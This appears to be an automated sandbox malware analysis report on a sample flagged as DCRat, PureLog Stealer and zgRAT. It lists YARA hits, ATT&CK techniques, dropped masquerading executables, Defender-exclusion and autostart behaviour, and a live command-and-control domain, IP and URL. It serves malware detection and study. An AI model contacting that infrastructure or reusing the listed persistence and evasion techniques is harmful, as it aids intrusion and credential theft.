                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe VolumeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeQueries volume information: C:\Users\user\Desktop\EQdhBjQw4G.exe VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe VolumeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeQueries volume information: C:\Users\user\Desktop\EQdhBjQw4G.exe VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe VolumeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeQueries volume information: C:\Users\user\Desktop\EQdhBjQw4G.exe VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe VolumeInformation
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeQueries volume information: C:\Users\user\Desktop\EQdhBjQw4G.exe VolumeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: EQdhBjQw4G.exe PID: 908, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 8180, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: EQdhBjQw4G.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.EQdhBjQw4G.exe.df0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: EQdhBjQw4G.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.EQdhBjQw4G.exe.df0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: EQdhBjQw4G.exe PID: 908, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 8180, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: EQdhBjQw4G.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.EQdhBjQw4G.exe.df0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: EQdhBjQw4G.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.EQdhBjQw4G.exe.df0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid AccountsWindows Management Instrumentation1
                            Scripting                            		11
                            Process Injection                            		132
                            Masquerading                            		OS Credential Dumping11
                            Security Software Discovery                            		1
                            Taint Shared Content                            		11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job311
                            Registry Run Keys / Startup Folder                            		311
                            Registry Run Keys / Startup Folder                            		11
                            Disable or Modify Tools                            		LSASS Memory1
                            Process Discovery                            		Remote Desktop Protocol1
                            Clipboard Data                            		2
                            Non-Application Layer Protocol                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		41
                            Virtualization/Sandbox Evasion                            		Security Account Manager41
                            Virtualization/Sandbox Evasion                            		SMB/Windows Admin SharesData from Network Shared Drive12
                            Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                            Process Injection                            		NTDS1
                            Application Window Discovery                            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information                            		LSA Secrets1
                            Remote System Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                            Obfuscated Files or Information                            		Cached Domain Credentials1
                            System Network Configuration Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                            Software Packing                            		DCSync2
                            File and Directory Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading                            		Proc Filesystem23
                            System Information Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            File Deletion                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549799 Sample: EQdhBjQw4G.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 61 861848cm.nyashkoon.ru 2->61 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 17 other signatures 2->73 8 EQdhBjQw4G.exe 8 28 2->8         started        12 ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe 2->12         started        15 ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe 2->15         started        17 13 other processes 2->17 signatures3 process4 dnsIp5 49 C:\...\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, PE32 8->49 dropped 51 C:\Users\user\Desktop\vTqzCdqK.log, PE32 8->51 dropped 53 C:\Users\user\Desktop\nmJRokpY.log, PE32 8->53 dropped 59 8 other malicious files 8->59 dropped 83 Creates an undocumented autostart registry key 8->83 85 Creates multiple autostart registry keys 8->85 87 Creates an autostart registry key pointing to binary in C:\Windows 8->87 89 Adds a directory exclusion to Windows Defender 8->89 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 powershell.exe 23 8->25         started        27 5 other processes 8->27 63 861848cm.nyashkoon.ru 37.44.238.250, 49730, 49732, 49734 HARMONYHOSTING-ASFR France 12->63 55 C:\Users\user\Desktop\FpFoWZYA.log, PE32 12->55 dropped 57 C:\Users\user\Desktop\CnTGBqTF.log, PE32 12->57 dropped 91 Antivirus detection for dropped file 12->91 93 Multi AV Scanner detection for dropped file 12->93 95 Machine Learning detection for dropped file 12->95 65 127.0.0.1 unknown unknown 17->65 file6 signatures7 process8 file9 75 Uses ping.exe to sleep 19->75 77 Uses ping.exe to check the status of other devices and networks 19->77 43 4 other processes 19->43 47 C:\Windows\...\SecurityHealthSystray.exe, PE32 22->47 dropped 79 Infects executable files (exe, dll, sys, html) 22->79 29 conhost.exe 22->29         started        31 cvtres.exe 1 22->31         started        81 Loading BitLocker PowerShell Module 25->81 33 conhost.exe 25->33         started        35 WmiPrvSE.exe 25->35         started        37 conhost.exe 27->37         started        39 conhost.exe 27->39         started        41 conhost.exe 27->41         started        45 2 other processes 27->45 signatures10 process11

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            EQdhBjQw4G.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            EQdhBjQw4G.exe53%VirustotalBrowse
                            EQdhBjQw4G.exe100%AviraHEUR/AGEN.1323342
                            EQdhBjQw4G.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat100%AviraBAT/Delbat.C
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe100%AviraHEUR/AGEN.1323342
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\nmJRokpY.log100%Joe Sandbox ML
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe100%Joe Sandbox ML
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\FpFoWZYA.log100%Joe Sandbox ML
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe53%VirustotalBrowse
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe53%VirustotalBrowse
                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe53%VirustotalBrowse
                            C:\Users\user\Desktop\CnTGBqTF.log24%ReversingLabs
                            C:\Users\user\Desktop\FpFoWZYA.log8%ReversingLabs
                            C:\Users\user\Desktop\nmJRokpY.log8%ReversingLabs
                            C:\Users\user\Desktop\vTqzCdqK.log24%ReversingLabs
                            C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            861848cm.nyashkoon.ru1%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php100%Avira URL Cloudmalware
                            http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php1%VirustotalBrowse

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            861848cm.nyashkoon.ru
                            		37.44.238.250
                            		truetrueunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.phptrue
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000018.00000003.1841092822.000001CE0CF1A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1841092822.000001CE0CE0E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2672003595.000001DD10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3162496814.0000016710076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3227843973.0000024D3A465000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3015277632.0000023D10076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3035136841.000001F25AF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
